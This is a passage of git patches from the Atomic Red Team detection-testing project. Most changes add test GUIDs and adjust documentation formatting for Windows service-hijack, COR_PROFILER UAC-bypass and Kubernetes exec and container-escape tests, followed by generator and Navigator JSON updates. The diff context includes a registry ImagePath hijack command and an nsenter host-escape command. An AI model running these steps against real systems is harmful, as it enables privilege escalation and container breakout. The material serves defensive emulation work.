## Atomic Test #1 - Execution of program.exe as service with unquoted service path + +auto_generated_guid: 2770dea7-c50f-457b-84c4-c40a47460d9f + When a service is created whose executable path contains spaces and isn’t enclosed within quotes, leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges. In this case, if an executable program.exe in C:\ exists, C:\program.exe will be executed instead of test.exe in C:\Program Files\subfolder\test.exe. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | service_executable | Path of the executable used for the service and as the hijacked program.exe | path | PathToAtomicsFolder\T1574.009\bin\WindowsServiceExample.exe| diff --git a/atomics/T1574.011/T1574.011.md b/atomics/T1574.011/T1574.011.md index f07dc900..18600716 100644 --- a/atomics/T1574.011/T1574.011.md +++ b/atomics/T1574.011/T1574.011.md @@ -16,16 +16,18 @@ Adversaries may also alter Registry keys associated with service failure paramet
## Atomic Test #1 - Service Registry Permissions Weakness + +auto_generated_guid: f7536d63-7fd4-466f-89da-7e48d550752a + Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg. reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePath /d "C:\temp\AtomicRedteam.exe" - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | weak_service_name | weak service check | String | weakservicename| @@ -47,15 +49,17 @@ get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |F
## Atomic Test #2 - Service ImagePath Change with reg.exe -Change Service registry ImagePath of a bengin service to a malicious file +auto_generated_guid: f38e9eea-e1d7-4ba6-b716-584791963827 + +Change Service registry ImagePath of a bengin service to a malicious file **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | weak_service_name | weak service name | String | calcservice| | weak_service_path | weak service path | String | %windir%\system32\win32calc.exe| @@ -80,7 +84,7 @@ sc.exe delete #{weak_service_name} ##### Description: The service must exist (#{weak_service_name}) ##### Check Prereq Commands: ```powershell -if (Get-Service #{weak_service_name}) {exit 0} else {exit 1} +if (Get-Service #{weak_service_name}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1574.012/T1574.012.md b/atomics/T1574.012/T1574.012.md index b84c5d66..958aac95 100644 --- a/atomics/T1574.012/T1574.012.md +++ b/atomics/T1574.012/T1574.012.md @@ -18,6 +18,9 @@ Adversaries may abuse COR_PROFILER to establish persistence that executes a mali
## Atomic Test #1 - User scope COR_PROFILER + +auto_generated_guid: 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a + Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER). The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by the Event Viewer process. Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. @@ -25,14 +28,13 @@ If the account used is not a local administrator the profiler DLL will still exe the notepad process will not execute with high integrity. Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_name | unmanaged profiler DLL | Path | PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll| | clsid_guid | custom clsid guid | String | {09108e71-974c-4010-89cb-acf471ae9e2c}| @@ -65,7 +67,7 @@ Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -Force -Er ##### Description: #{file_name} must be present ##### Check Prereq Commands: ```powershell -if (Test-Path #{file_name}) {exit 0} else {exit 1} +if (Test-Path #{file_name}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -80,20 +82,22 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - System Scope COR_PROFILER + +auto_generated_guid: f373b482-48c8-4ce4-85ed-d40c8b3f7310 + Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect. The unmanaged profiler DLL (T1574.012x64.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity. Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_name | unmanaged profiler DLL | Path | PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll| | clsid_guid | custom clsid guid | String | {09108e71-974c-4010-89cb-acf471ae9e2c}| @@ -122,7 +126,7 @@ Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manage ##### Description: #{file_name} must be present ##### Check Prereq Commands: ```powershell -if (Test-Path #{file_name}) {exit 0} else {exit 1} +if (Test-Path #{file_name}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -137,17 +141,19 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #3 - Registry-free process scope COR_PROFILER + +auto_generated_guid: 79d57242-bbef-41db-b301-9d01d9f6e817 + Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by PowerShell. Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_name | unamanged profiler DLL | Path | PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll| | clsid_guid | custom clsid guid | String | {09108e71-974c-4010-89cb-acf471ae9e2c}| @@ -176,7 +182,7 @@ $env:COR_PROFILER_PATH = '' ##### Description: #{file_name} must be present ##### Check Prereq Commands: ```powershell -if (Test-Path #{file_name}) {exit 0} else {exit 1} +if (Test-Path #{file_name}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1609/T1609.md b/atomics/T1609/T1609.md index 801cec20..292c6f39 100644 --- a/atomics/T1609/T1609.md +++ b/atomics/T1609/T1609.md @@ -12,15 +12,17 @@ In Docker, adversaries may specify an entrypoint during container deployment tha
## Atomic Test #1 - ExecIntoContainer -Attackers who have permissions, can run malicious commands in containers in the cluster using exec command (“kubectl exec”). In this method, attackers can use legitimate images, such as an OS image (e.g., Ubuntu) as a backdoor container, and run their malicious code remotely by using “kubectl exec”. +auto_generated_guid: d03bfcd3-ed87-49c8-8880-44bb772dea4b + +Attackers who have permissions, can run malicious commands in containers in the cluster using exec command (“kubectl exec”). In this method, attackers can use legitimate images, such as an OS image (e.g., Ubuntu) as a backdoor container, and run their malicious code remotely by using “kubectl exec”. **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | namespace | K8s namespace to use | String | default| | command | Command to run | String | uname| diff --git a/atomics/T1610/T1610.md b/atomics/T1610/T1610.md index 32a1c397..c1e1dbd6 100644 --- a/atomics/T1610/T1610.md +++ b/atomics/T1610/T1610.md @@ -12,12 +12,14 @@ Containers can be deployed by various means, such as via Docker's create ## Atomic Test #1 - Deploy container using nsenter container escape + +auto_generated_guid: 58004e22-022c-4c51-b4a8-2b85ac5c596b + In this escape `kubectl` is used to launch a new pod, with a container that has the host pids mapped into the container (`hostPID:true`). It uses the alpine linux container image. It runs with privilege on the host (`privileged:true`). When the container is launched the command `nsenter --mount=/proc/1/ns/mnt -- /bin/bash` is ran. Since the host processes have been mapped into the container, the container enters the host namespace, escaping the container. Additional Details: - https://twitter.com/mauilion/status/1129468485480751104 - https://securekubernetes.com/scenario_2_attack/ - **Supported Platforms:** Linux @@ -42,7 +44,7 @@ kubectl --context kind-atomic-cluster delete pod atomic-escape-pod ##### Description: Verify docker is installed. ##### Check Prereq Commands: ```sh -which docker +which docker ``` ##### Get Prereq Commands: ```sh @@ -51,7 +53,7 @@ if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt ##### Description: Verify docker service is running. ##### Check Prereq Commands: ```sh -sudo systemctl status docker +sudo systemctl status docker ``` ##### Get Prereq Commands: ```sh @@ -60,7 +62,7 @@ sudo systemctl start docker ##### Description: Verify kind is in the path. ##### Check Prereq Commands: ```sh -which kind +which kind ``` ##### Get Prereq Commands: ```sh @@ -71,7 +73,7 @@ mv kind /usr/bin/kind ##### Description: Verify kind-atomic-cluster is created ##### Check Prereq Commands: ```sh -sudo kind get clusters +sudo kind get clusters ``` ##### Get Prereq Commands: ```sh @@ -80,7 +82,7 @@ sudo kind create cluster --name atomic-cluster ##### Description: Verify kubectl is in path ##### Check Prereq Commands: ```sh -which kubectl +which kubectl ``` ##### Get Prereq Commands: ```sh diff --git a/atomics/T1611/T1611.md b/atomics/T1611/T1611.md index 44fbe47a..b39e3b53 100644 --- a/atomics/T1611/T1611.md +++ b/atomics/T1611/T1611.md @@ -12,12 +12,14 @@ There are multiple ways an adversary may escape to a host environment. Examples
## Atomic Test #1 - Deploy container using nsenter container escape + +auto_generated_guid: 0b2f9520-a17a-4671-9dba-3bd034099fff + In this escape `kubectl` is used to launch a new pod, with a container that has the host pids mapped into the container (`hostPID:true`). It uses the alpine linux container image. It runs with privilege on the host (`privileged:true`). When the container is launched the command `nsenter --mount=/proc/1/ns/mnt -- /bin/bash` is ran. Since the host processes have been mapped into the container, the container enters the host namespace, escaping the container. Additional Details: - https://twitter.com/mauilion/status/1129468485480751104 - https://securekubernetes.com/scenario_2_attack/ - **Supported Platforms:** Linux @@ -42,7 +44,7 @@ kubectl --context kind-atomic-cluster delete pod atomic-escape-pod ##### Description: Verify docker is installed. ##### Check Prereq Commands: ```sh -which docker +which docker ``` ##### Get Prereq Commands: ```sh @@ -51,7 +53,7 @@ if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt ##### Description: Verify docker service is running. ##### Check Prereq Commands: ```sh -sudo systemctl status docker +sudo systemctl status docker ``` ##### Get Prereq Commands: ```sh @@ -60,7 +62,7 @@ sudo systemctl start docker ##### Description: Verify kind is in the path. ##### Check Prereq Commands: ```sh -which kind +which kind ``` ##### Get Prereq Commands: ```sh @@ -71,7 +73,7 @@ mv kind /usr/bin/kind ##### Description: Verify kind-atomic-cluster is created ##### Check Prereq Commands: ```sh -sudo kind get clusters +sudo kind get clusters ``` ##### Get Prereq Commands: ```sh @@ -80,7 +82,7 @@ sudo kind create cluster --name atomic-cluster ##### Description: Verify kubectl is in path ##### Check Prereq Commands: ```sh -which kubectl +which kubectl ``` ##### Get Prereq Commands: ```sh From 157af0ce47cac52a0d9f2873a882db3c7d51e36d Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Thu, 24 Jun 2021 09:24:23 -0600 Subject: [PATCH 65/84] move guid under description in MD file and make bold --- atomic_red_team/atomic_doc_template.md.erb | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/atomic_red_team/atomic_doc_template.md.erb b/atomic_red_team/atomic_doc_template.md.erb index 62a77d6f..d2dbbe9b 100644 --- a/atomic_red_team/atomic_doc_template.md.erb +++ b/atomic_red_team/atomic_doc_template.md.erb @@ -13,11 +13,9 @@
## Atomic Test #<%= test_number+1 %> - <%= test['name'] %> - -auto_generated_guid: <%= test['auto_generated_guid'] %> - <%= test['description'].strip -%> + **Supported Platforms:** <%= test['supported_platforms'].collect do |p| case p when 'macos' @@ -27,6 +25,10 @@ auto_generated_guid: <%= test['auto_generated_guid'] %> end end.join(', ') %> + +**auto_generated_guid:** <%= test['auto_generated_guid'] %> + + <%def cleanup(input) input.to_s.strip.gsub(/\\/,"\") end%> From d5c5979247a1e4ed8a410e6621ee6b103512cfb5 Mon Sep 17 00:00:00 2001 From: Jose Enrique Hernandez Date: Thu, 24 Jun 2021 11:31:51 -0400 Subject: [PATCH 66/84] adding url md file for each atomic as a comment (#1530) --- bin/generate-atomic-docs.rb | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/bin/generate-atomic-docs.rb b/bin/generate-atomic-docs.rb index f396d563..3e4e0078 100755 --- a/bin/generate-atomic-docs.rb +++ b/bin/generate-atomic-docs.rb @@ -212,12 +212,14 @@ class AtomicRedTeamDocs technique = { "techniqueID" => atomic_yaml['attack_technique'], "score" => 100, - "enabled" => true + "enabled" => true, + "comment" => "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/" + atomic_yaml['attack_technique'] + "/" + atomic_yaml['attack_technique'] + ".md" } techniqueParent = { "techniqueID" => atomic_yaml['attack_technique'].split('.')[0], "score" => 100, - "enabled" => true + "enabled" => true, + "comment" => "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/" + atomic_yaml['attack_technique'] + "/" + atomic_yaml['attack_technique'] + ".md" } techniques.push(technique) From bedaf8bbd5cc9df045bd8687e0460ab463afbd4b Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 24 Jun 2021 15:32:29 +0000 Subject: [PATCH 67/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- .../Attack-Navigator-Layers/art-navigator-layer-linux.json | 2 +- .../Attack-Navigator-Layers/art-navigator-layer-macos.json | 2 +- .../Attack-Navigator-Layers/art-navigator-layer-windows.json | 2 +- .../Indexes/Attack-Navigator-Layers/art-navigator-layer.json | 2 +- 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json index cdeac0bd..5358846e 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json @@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.007","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.005","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1110.004","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://g